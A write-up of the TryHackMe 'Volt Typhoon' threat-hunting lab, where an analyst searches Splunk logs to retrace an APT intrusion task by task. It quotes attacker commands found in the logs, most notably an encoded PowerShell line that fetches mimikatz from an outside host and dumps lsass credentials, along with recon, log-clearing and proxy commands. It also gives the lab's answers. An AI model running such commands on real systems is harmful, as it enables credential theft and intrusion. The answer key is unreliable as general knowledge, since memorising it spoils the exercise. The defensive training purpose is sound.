Volt Typhoon – TryHackMe

Threat Hunting Scenario Using Splunk

Scenario

he SOC has detected suspicious activity indicative of an advanced persistent threat (APT) group known as Volt Typhoon, notorious for targeting high-value organizations. Assume the role of a security analyst and investigate the intrusion by retracing the attacker’s steps.

You have been provided with various log types from a two-week time frame during which the suspected attack occurred. Your ability to research the suspected APT and understand how they maneuver through targeted networks will prove to be just as important as your Splunk skills.

Connect to OpenVPN or use the AttackBox to access Splunk. Please give the machine about 4 minutes to boot.

Task 2 – Initial Access

Volt Typhoon often gains initial access to target networks by exploiting vulnerabilities in enterprise software. In recent incidents, Volt Typhoon has been observed leveraging vulnerabilities in Zoho ManageEngine ADSelfService Plus, a popular self-service password management solution used by organizations.

Comb through the ADSelfService Plus logs to begin retracing the attacker’s steps. At what time (ISO 8601 format) was Dean’s password changed and their account taken over by the attacker?

Filtering on ADSelfServicePlus logs and on Dean, we find the password was changed after many failed Account Unlock and a single Account Unlock that succeeded:

{968AF348-73BC-4C2A-A969-0DC62D21EEE3}.png
{49615753-A93C-4394-B89B-FD8A0CD8BAEE}.png

Shortly after Dean’s account was compromised, the attacker created a new administrator account. What is the name of the new account that was created?

Directly after the password modification, we find an account creation:

{A09EB5B2-0F9A-419B-B1A2-5116A0F18EBA}.png

Task 3 – Execution

Volt Typhoon is known to exploit Windows Management Instrumentation Command-line (WMIC) for a range of execution techniques. They leverage WMIC for tasks such as gathering information and dumping valuable databases, allowing them to infiltrate and exploit target networks. By using “living off the land” binaries (LOLBins), they blend in with legitimate system activity, making detection more challenging.

Filtering on server01 and server02:

{37426944-0905-48AA-B303-4EEB7B7EDE83}.png

We find the command was:

{1C962586-3612-4BCB-9660-4EA408B14DB6}.png
wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename

In an information gathering attempt, what command does the attacker run to find information about local drives on server01 & server02?

AD databases have .dit extensions. So searching for .dit we find:

{9F2D2E77-5CB7-44C7-959C-1990E7D540DE}.png
{50EAF47A-40F5-4C06-9D67-FF444DFE80BA}.png

Hence the password was:

d5ag0nm@5t3r

Task 4 – Persistence

Our target APT frequently employs web shells as a persistence mechanism to maintain a foothold. They disguise these web shells as legitimate files, enabling remote control over the server and allowing them to execute commands undetected.

To establish persistence on the compromised server, the attacker created a web shell using base64 encoded text. In which directory was the web shell placed?

Seaching for aspx:

{4AD758DA-78C4-4D06-AA73-C9AC114E939B}.png

We find it was in:

C:\\Windows\\Temp

Task 5 – Defense Evasion

Volt Typhoon utilizes advanced defense evasion techniques to significantly reduce the risk of detection. These methods encompass regular file purging, eliminating logs, and conducting thorough reconnaissance of their operational environment.

In an attempt to begin covering their tracks, the attackers remove evidence of the compromise. They first start by wiping RDP records. What PowerShell cmdlet does the attacker use to remove the “Most Recently Used” record?

In PowerShell, Remove-ItemProperty can be used to remove most recently used records:

{198C8097-EB56-4AC4-AC0B-CD6323B02D88}.png

The APT continues to cover their tracks by renaming and changing the extension of the previously created archive. What is the file name (with extension) created by the attackers?

We found previously that the archive was named cisco. Searching for cisco in the logs, we find the new name:

image.png
cl64.gif

Under what regedit path does the attacker check for evidence of a virtualized environment?

Searching for virtual in the logs, we find the regedit path:

{1C0F3663-053C-4F8D-8F54-5E5B50D4B16D}.png
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control

Task 6 – Credential Access

Volt Typhoon often combs through target networks to uncover and extract credentials from a range of programs. Additionally, they are known to access hashed credentials directly from system memory.

Using reg query, Volt Typhoon hunts for opportunities to find useful credentials. What three pieces of software do they investigate?

Searching for reg query:

{4AC577BE-C111-4F36-9D7F-8167846338A1}.png

We find:

OpenSSH, putty, realvnc

What is the full decoded command the attacker uses to download and run mimikatz?

Searching for:

-exec bypass -W hidden -nop -E

We find the base64 command:

image.png
-exec bypass -W hidden -nop -E SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3ZvbHR5cC5jb20vMy90bHovbWltaWthdHouZXhlIiAtT3V0RmlsZSAiQzpcVGVtcFxkYjJcbWltaWthdHouZXhlIjsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFRlbXBcZGIyXG1pbWlrYXR6LmV4ZSIgLUFyZ3VtZW50TGlzdCBAKCJzZWt1cmxzYTo6bWluaWR1bXAgbHNhc3MuZG1wIiwgImV4aXQiKSAtTm9OZXdXaW5kb3cgLVdhaXQ=

We can then decode the base64 using CyberChef and we get:

Invoke-WebRequest -Uri "<http://voltyp.com/3/tlz/mimikatz.exe>" -OutFile "C:\\Temp\\db2\\mimikatz.exe"; Start-Process -FilePath "C:\\Temp\\db2\\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait

Task 7 – Discovery & Lateral Movement

Discovery

Volt Typhoon uses enumeration techniques to gather additional information about network architecture, logging mechanisms, successful logins, and software configurations, enhancing their understanding of the target environment for strategic purposes.

Lateral Movement

The APT has been observed moving previously created web shells to different servers as part of their lateral movement strategy. This technique facilitates their ability to traverse through networks and maintain access across multiple systems.

The attacker uses wevtutil, a log retrieval tool, to enumerate Windows logs. What event IDs does the attacker search for?

We filter on wevutil logs, we find:

4624 4625 4769

Moving laterally to server-02, the attacker copies over the original web shell. What is the name of the new web shell that was created?

Filtering on server02 logs, we find:

AuditReport.jspx

Task 8 – Collection

During the collection phase, Volt Typhoon extracts various types of data, such as local web browser information and valuable assets discovered within the target environment.

The attacker is able to locate some valuable financial information during the collection phase. What three files does Volt Typhoon make copies of using PowerShell

In PowerShell, files can be copied using Copy-Item. So filtering on Copy-Item:

{63C4E438-F22B-421D-9A05-3E2CCACEE545}.png

We find:

2022.csv 2023.csv 2024.csv

Task 9 – C2 & Cleanup

C2

Volt Typhoon utilizes publicly available tools as well as compromised devices to establish discreet command and control (C2) channels.

Cleanup

To cover their tracks, the APT has been observed deleting event logs and selectively removing other traces and artifacts of their malicious activities.

The attacker uses netsh to create a proxy for C2 communications. What connect address and port does the attacker use when setting up the proxy?

Filtering on netsh logs, we find:

10.2.30.1 8443

To conceal their activities, what are the four types of event logs the attacker clears on the compromised system?

Filtering on wevtutil logs, we find:

{AD780502-A6AA-4211-91C3-245E936A85F9}.png
Application Security Setup System

Related Posts

Trending now

Support – Hack The Box
Timelapse – Hack The Box
Sauna – Hack The Box
Forest